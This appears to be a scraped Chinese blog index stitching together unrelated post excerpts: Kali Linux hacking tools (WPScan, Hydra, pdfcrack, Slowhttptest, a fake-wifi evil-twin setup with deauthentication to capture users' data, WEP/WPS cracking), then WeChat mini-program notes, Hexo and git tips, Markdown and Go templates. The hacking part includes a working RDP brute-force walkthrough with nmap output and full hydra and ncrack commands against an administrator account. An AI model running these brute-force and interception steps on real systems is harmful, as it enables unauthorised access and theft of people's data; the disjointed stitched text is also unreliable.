我这里使用的Kali Linux，它默认安装了WPScan。

在使用WPScan之前，先更新它的漏洞数据库：

Hydra是非常高效的网络登录破解工具，它可以对多种服务程序执行暴力破解（SSH、VNC等等）。

本帖介绍怎么创建假的wifi热点，然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包，使这些路由器瘫痪，强迫用户连接（或自动连接）我们创建的假wifi热点。

pdfcrack是破解PDF保护密码的Linux命令行工具。

安装pdfcrack

Debian系列：

# apt install pdfcrack

Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具，它的设计原理是要求服务器所有请求被完全接收后再进行处理。

RDP是远程桌面协议。

$ nmap your_target
Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST
Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx)
Host is up (0.28s latency).
Not shown: 988 closed ports
PORT      STATE    SERVICE
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
3389/tcp  open     ms-wbt-server   # 这个是远程桌面端口
4444/tcp  filtered krb524
6667/tcp  filtered irc
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49163/tcp open     unknown
Nmap done: 1 IP address (1 host up) scanned in 28.14 seconds

使用hydra暴力破解：

hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://your_target

-t = TASKS run TASKS number of connects in parallel (per host, default: 16) RDP set to maximum of 4.
-V = Verbose shows you the attempted passwords.
-l = Username
-P = Password list
rdp:// = Port 3389

使用ncrack暴力破解：

ncrack -p 3389 -v -user administrator -P /usr/share/wordlists/rockyou.txt 192.95.xx.xx

-p = Port number
-v = Verbose shows you any found passwords in realtime
-user = username
-P = Password list

远程桌面登录：

rdesktop your_target

来自wikipeida：

Wi-Fi保护设置（简称WPS，全称Wi-Fi Protected Setup）是一个无线网络安全标准，旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟（Wi-Fi Alliance）于2006年制定。

Kali Linux能做很多事，但是它主要以渗透测试及’破解wifi密码’闻名。

如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码

WEP是无线路由器最初广泛使用的一种加密方式，这种加密方式非常容易被破解。

目前很少有人使用wep加密方式，但是还是会有。

文本仅供学习交流。

我使用的系统是macbook pro 15：

安装aircrack-ng

使用homebrew安装，命令：

最近有个奇葩要求 要项目中的N行代码 申请专利啥的
然后作为程序员当然不能复制粘贴 用代码解决。。

小程序： 行家看看

年前，公司开发了微信小程序，我负责后端开发，其中遇到一些坑，分享一下

小程序语音录制和播放

1. 微信录音不能计时，需要自己计时
2. 录音文件是微信独有格式，只能微信本身播放，否则需要工具转换为Mp3等通用格式才可以
3. 录音播放不能直接用标签src引入，需要将语音文件下载到本地后才可以正常播放。
4. 录音播放没有播放完成的事件，需要自己计时

小程序视频录制和播放

1. 视频录制很费空间
2. 视频需要压缩再上传，否则会很卡，或者上传失败
3. 又拍云的视频处理文档是狗屎,直接问客服，否则处理回调不会成功
   目前就这些，想到了再写

我的博客主题是直接fork原作者的，所以当原作者更新之后，我要合并冲突，跟随更新
下面说一下简单的方法，算是自己做个笔记

使用Github托管hexo静态博客的优缺点

Hexo 是一个快速、简洁且高效的博客框架。Hexo 使用 Markdown（或其他渲染引擎）解析文章，在几秒内，即可利用靓丽的主题生成静态网页。

也就是说你用WP做博客已经OUT了，现在流行纯静态博客

本文献给对git很迷茫的新手，注意是新手，但至少会点基本操作，有点基本概念的新手，我不会从怎么用github和git是什么开始讲的。如果作为新手你看书又看不进去，原理又太复杂，又没有直接了当告诉我们怎么给项目贡献代码，和项目同步代码的大体流程。于是我快速写了这么个东西。一来整理下自己混乱的思路，二来想号召大家一起用git开发点东西，可是好几个同鞋只会寂寞的给自己push。

今天看到一个朋友在github上面的issue
大概问题就是怎么在不同的电脑上面使用
git有个这么个东西Submoudle中文叫做子模块

Markdown是_什么_？

Markdown是一种轻量级标记语言，它以纯文本形式(易读、易写、易更改)编写文档，并最终以HTML格式发布。

本文转载自不蒜子不如

静态网站建站现在有很多快速的技术和平台，但静态是优点也有缺点，由于是静态的，一些动态的内容如评论、计数等等模块就需要借助外来平台，评论有“多说”，计数有“不蒜”！

模板语法

with关键字

type u struct {
        Name string
        Age int
        Sex string
    }
    user:=&u{Name:"asd",Age:20,Sex:"mal"}
    data["user"]=user
    c.HTML(http.StatusOK, "index.html", data)

输出

    {{with .user}}
    {{.Name}};
    {{.Age}};
    {{.Sex}}
    {{end}}

循环打印数组

nums := []int{1,2,3,4,5,6,7,8,9,0}
data["nums"]=nums

输出

    {{range .nums}}
    {{.}}
    {{end}}

高级使用-模板变量

data["abc"] = "helloword-abc"
    c.HTML(http.StatusOK, "index.html", data)

模板变量示例

虽然我是搞asp.net的 但是十分欣赏php，php有很多开源的博客程序 比如大名鼎鼎的WordPress.还有各种独立博客大牛使用的z-blog,以及短小精悍的emblog。